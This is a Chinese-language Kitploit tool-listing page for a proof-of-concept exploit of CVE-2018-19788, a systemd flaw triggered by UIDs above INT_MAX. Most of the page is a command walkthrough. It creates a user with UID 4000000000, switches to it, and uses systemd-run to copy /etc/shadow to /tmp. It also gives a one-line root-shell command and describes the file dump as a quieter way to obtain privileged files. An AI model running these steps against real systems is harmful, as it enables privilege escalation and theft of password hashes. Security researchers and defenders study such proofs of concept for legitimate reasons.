Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC — 利用CVE-2018-19788无需root shell | Kitploit
工具/GitHubGitHub/ekultek/poc
权限提升漏洞分析漏洞利用后渗透利用渗透测试红队
GitHubekultek/poc

PoC

利用CVE-2018-19788无需root shell

查看仓库
1977年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

利用CVE-2018-19788在没有root shell的情况下转储受保护文件

CVE-2018-19788 是一个漏洞,任何UID超过INT_MAX(即4000000000)的用户都可以在运行systemd的Linux系统(如Ubuntu)上执行任何systemctl命令。(已有获取root shell的详细文章:这里)。这篇分析与完整root shell文章的主要区别在于,此方法将以用户自身身份运行,而非root用户(老实说,基本上只是一个概念验证)。

在不执行root shell的情况下获取/etc/shadow

要获取root shell,只需运行 systemd-run -t /bin/bash 即可,但如果你想低调行事,可以运行简单命令来获取特权文件,而不使用终端。请按照以下步骤操作:

  • 添加一个UID超过INT_MAX的用户:
    root@kitploit:~
    adduser --uid 4000000000 someusername
    
  • 切换到该用户账户:
    root@kitploit:~
    su someusername
    
  • 运行你想要获取的任何文件的命令(这里我们以/etc/shadow为例):
    root@kitploit:~
    systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
    
  • 你的文件现在位于 /tmp:
    root@kitploit:~
    cat /tmp/results_poc.txt
    

PoC 视频

视频截图

下载工具